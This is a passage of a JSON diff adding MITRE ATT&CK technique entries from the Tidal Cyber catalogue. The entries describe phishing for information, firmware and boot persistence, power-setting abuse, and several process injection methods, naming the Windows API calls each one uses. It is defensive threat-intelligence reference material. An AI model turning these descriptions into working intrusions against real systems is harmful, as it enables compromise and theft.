Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.[[ThreatPost Social Media Phishing](https://app.tidalcyber.com/references/186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7)] These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1598.001" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "7f953df5-c91f-4975-a579-2be3c89bca7e", + "value": "Spearphishing Service" + }, + { + "description": "Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or \"vishing\"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.[[BOA Telephone Scams](https://app.tidalcyber.com/references/ee1abe19-f38b-5127-8377-f13f57f2abcb)]\n\nVictims may also receive phishing messages that direct them to call a phone number (\"callback phishing\") where the adversary attempts to collect confidential information.[[Avertium callback phishing](https://app.tidalcyber.com/references/abeb1146-e5e5-5ecc-9b70-b348fba097f6)]\n\nAdversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to tailor pretexts to be even more persuasive and believable for the victim.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1598.004" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "113b8750-d166-5cac-bd26-2c82c90b9d88", + "value": "Spearphishing Voice" + }, + { + "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.[[ThreatPost Social Media Phishing](https://app.tidalcyber.com/references/186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7)][[TrendMictro Phishing](https://app.tidalcyber.com/references/621f1c52-5f34-4293-a507-b58c4084a19b)][[PCMag FakeLogin](https://app.tidalcyber.com/references/f652524c-7950-4a8a-9860-0e658a9581d8)][[Sophos Attachment](https://app.tidalcyber.com/references/b4aa5bf9-31db-42ee-93e8-a576ecc00b57)][[GitHub Phishery](https://app.tidalcyber.com/references/6da51561-a813-4802-aa84-1b3de1bc2e14)] Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.[[Avertium callback phishing](https://app.tidalcyber.com/references/abeb1146-e5e5-5ecc-9b70-b348fba097f6)]\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)] the identity of the sender which can be used to fool both the human recipient as well as automated security tools.[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)] \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://app.tidalcyber.com/technique/01505d46-8675-408d-881e-68f4d8743d47)).[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)][[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + }, + { + "dest-uuid": "b18ddaf9-2939-45db-8b2a-2edecc2097ac", + "type": "similar" + }, + { + "dest-uuid": "4a68c72c-79c1-4fed-9107-75bb5b06dfc3", + "type": "similar" + }, + { + "dest-uuid": "7f953df5-c91f-4975-a579-2be3c89bca7e", + "type": "similar" + }, + { + "dest-uuid": "113b8750-d166-5cac-bd26-2c82c90b9d88", + "type": "similar" + } + ], + "uuid": "b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06", + "value": "Phishing for Information" + }, + { + "description": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.[[fileinfo plist file description](https://app.tidalcyber.com/references/24331b9d-68af-4db2-887f-3a984b6c5783)] \n\nAdversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://app.tidalcyber.com/technique/5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd)) or running additional commands for persistence (ex: [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)/[Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) or [Re-opened Applications](https://app.tidalcyber.com/technique/9459a27a-b892-4864-9916-814130bea485)).\n\nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application’s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759).[[wardle chp2 persistence](https://app.tidalcyber.com/references/3684bacb-24cb-4467-b463-d0d3f5075c5c)][[eset_osx_flashback](https://app.tidalcyber.com/references/ce6e5a21-0063-4356-a77a-5c5f9fd2cf5c)]", + "meta": { + "platforms": [ + "macOS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "ee177ad0-d282-42c0-91f9-7bcf724e3d31", + "value": "Plist File Modification" + }, + { + "description": "Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.[[Sleep, shut down, hibernate](https://app.tidalcyber.com/references/e9064801-0297-51d0-9089-db58f4811a9f)]\n\nAdversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.[[Microsoft: Powercfg command-line options](https://app.tidalcyber.com/references/d9b5be77-5e44-5786-a683-82642b8dd8c9)][[systemdsleep Linux](https://app.tidalcyber.com/references/9537f6f9-1521-5c21-b14f-ac459a2d1b70)]\n\nFor example, `powercfg` controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.[[Two New Monero Malware Attacks Target Windows and Android Users](https://app.tidalcyber.com/references/a797397b-2af7-58b9-b66a-5ded260659f0)] Adversaries may also extend system lock screen timeout settings.[[BATLOADER: The Evasive Downloader Malware](https://app.tidalcyber.com/references/53e12ade-99ed-51ee-b5c8-32180f144658)] Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.[[CoinLoader: A Sophisticated Malware Loader Campaign](https://app.tidalcyber.com/references/83469ab3-0199-5679-aa25-7b6885019552)]\n\nAware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.[[Condi-Botnet-binaries](https://app.tidalcyber.com/references/a92b0d6c-b3e8-56a4-b1b4-1d117e59db84)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "0719ea2b-d630-5ada-9b04-c3136ff530ae", + "value": "Power Settings" + }, + { + "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). [[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)] The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. [[Lau 2011](https://app.tidalcyber.com/references/fa809aab-5051-4f9c-8e27-b5989608b03c)]\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1542.003" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "032985de-5e09-4889-b8c4-84d940c6346c", + "value": "Bootkit" + }, + { + "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://app.tidalcyber.com/technique/4050dbda-5cb0-4bd6-8444-841e55611f3a) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1542.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "764041d4-ff10-45d0-b42e-2f23ca334740", + "value": "Component Firmware" + }, + { + "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. [[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)][[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://app.tidalcyber.com/technique/6f2186f3-c798-46e8-a26f-ae033822837b), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1542.004" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "b9d60848-388e-444c-9f22-2267ea61b5e9", + "value": "ROMMONkit" + }, + { + "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. [[Wikipedia BIOS](https://app.tidalcyber.com/references/0c4a2cb3-d663-47ee-87af-c5e9e68fe15f)] [[Wikipedia UEFI](https://app.tidalcyber.com/references/681c6a57-76db-410b-82d6-4e614bcdb6e0)] [[About UEFI](https://app.tidalcyber.com/references/2e6fe82c-d90f-42b6-8247-397ab8823c7c)]\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1542.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "4050dbda-5cb0-4bd6-8444-841e55611f3a", + "value": "System Firmware" + }, + { + "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) and may result in the network device running a modified image. [[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1542.005" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "6f2186f3-c798-46e8-a26f-ae033822837b", + "value": "TFTP Boot" + }, + { + "description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[[Wikipedia Booting](https://app.tidalcyber.com/references/6d9c72cb-6cda-445e-89ea-7e695063d49a)]\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "032985de-5e09-4889-b8c4-84d940c6346c", + "type": "similar" + }, + { + "dest-uuid": "764041d4-ff10-45d0-b42e-2f23ca334740", + "type": "similar" + }, + { + "dest-uuid": "b9d60848-388e-444c-9f22-2267ea61b5e9", + "type": "similar" + }, + { + "dest-uuid": "4050dbda-5cb0-4bd6-8444-841e55611f3a", + "type": "similar" + }, + { + "dest-uuid": "6f2186f3-c798-46e8-a26f-ae033822837b", + "type": "similar" + } + ], + "uuid": "33cd26b0-0248-4ee2-97a6-aab6a79824af", + "value": "Pre-OS Boot" + }, + { + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://app.tidalcyber.com/technique/710ae610-0556-44e5-9de9-8be6159a23dd) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98) utility via [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or Get-Process via [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). Information about processes can also be extracted from the output of [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.\n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show processes` can be used to display current running processes.[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)][[show_processes_cisco_cmd](https://app.tidalcyber.com/references/944e529b-5e8a-54a1-b205-71dcb7dd304f)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "710ae610-0556-44e5-9de9-8be6159a23dd", + "value": "Process Discovery" + }, + { + "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue [[Microsoft APC](https://app.tidalcyber.com/references/37f1ef6c-fc0e-4e47-85ab-20d53caba77e)] of a process's thread. Queued APC functions are executed when the thread enters an alterable state.[[Microsoft APC](https://app.tidalcyber.com/references/37f1ef6c-fc0e-4e47-85ab-20d53caba77e)] A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. [[CyberBit Early Bird Apr 2018](https://app.tidalcyber.com/references/8ae4ec67-518e-46dd-872c-7e2a9ca4ef13)] AtomBombing [[ENSIL AtomBombing Oct 2016](https://app.tidalcyber.com/references/9282dbab-391c-4ffd-ada9-1687413b686b)] is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.[[Microsoft Atom Table](https://app.tidalcyber.com/references/a22636c8-8e39-4583-93ef-f0b7f0a218d8)]\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.004" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "abccbb2a-2ea8-43b8-95dc-c583df300c07", + "value": "Asynchronous Procedure Call" + }, + { + "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). [[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)] \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).[[Elastic HuntingNMemory June 2017](https://app.tidalcyber.com/references/8cd58716-4ff1-4ba2-b980-32c52cf7dee8)][[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)] \n\nAnother variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process.[[Module Stomping for Shellcode Injection](https://app.tidalcyber.com/references/0f9b58e2-2a81-4b79-aad6-b36a844cf1c6)] This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.[[Hiding Malicious Code with Module Stomping](https://app.tidalcyber.com/references/88983d22-980d-4442-858a-3b70ec485b94)] \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.001" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "232bb95b-a267-4cc2-8eb1-67ecdd5babd5", + "value": "Dynamic-link Library Injection" + }, + { + "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).[[Microsoft Window Classes](https://app.tidalcyber.com/references/cc620fcd-1f4a-4670-84b5-3f12c9b85053)] Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. [[Microsoft GetWindowLong function](https://app.tidalcyber.com/references/4366217a-2325-4056-ab68-f5f4d2a0703c)] [[Microsoft SetWindowLong function](https://app.tidalcyber.com/references/11755d06-a9df-4a19-a165-2995f25c4b12)]\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)] More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. [[MalwareTech Power Loader Aug 2013](https://app.tidalcyber.com/references/9a9a6ca1-d7c5-4385-924b-cdeffd66602e)] [[WeLiveSecurity Gapz and Redyms Mar 2013](https://app.tidalcyber.com/references/b8d328b7-2eb3-4851-8d44-2e1bad7710c2)]\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.011" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "43d872bd-3d54-4ea3-bc89-a2f979db0d5a", + "value": "Extra Window Memory Injection" + }, + { + "description": "Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.\n\nList-view controls are user interface windows used to display collections of items.[[Microsoft List View Controls](https://app.tidalcyber.com/references/7d6c6ba6-cda6-4f27-bfc8-af5b759305ed)] Information about an application's list-view settings are stored within the process' memory in a SysListView32 control.\n\nListPlanting (a form of message-passing \"shatter attack\") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.[[Modexp Windows Process Injection](https://app.tidalcyber.com/references/1bf45166-bfce-450e-87d1-b1e3b19fdb62)] Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows) or other [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) methods.\n\nSome variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)] \n\nFinally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.015" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "c262a10e-13db-4c47-995c-87201cdf858d", + "value": "ListPlanting" + }, + { + "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. [[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)] \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1055.002" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "2afcdcd1-ce55-4837-a84d-8279bc10f948", + "value": "Portable Executable Injection" + }, + { + "description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. [[Microsoft TxF](https://app.tidalcyber.com/references/f7f2eecc-19e6-4d93-8a53-91afea2f242e)] To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. [[Microsoft Basic TxF Concepts](https://app.tidalcyber.com/references/72798536-a7e3-43e2-84e3-b5b8b54f0bca)] To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. [[Microsoft Where to use TxF](https://app.tidalcyber.com/references/f315072c-67cb-4166-aa18-8e92e00ef7e8)]\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. [[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e). Similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. [[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]\n\nProcess Doppelgänging is implemented in 4 steps [[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]:\n\n* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load – Create a shared section of memory and load the malicious executable.\n* 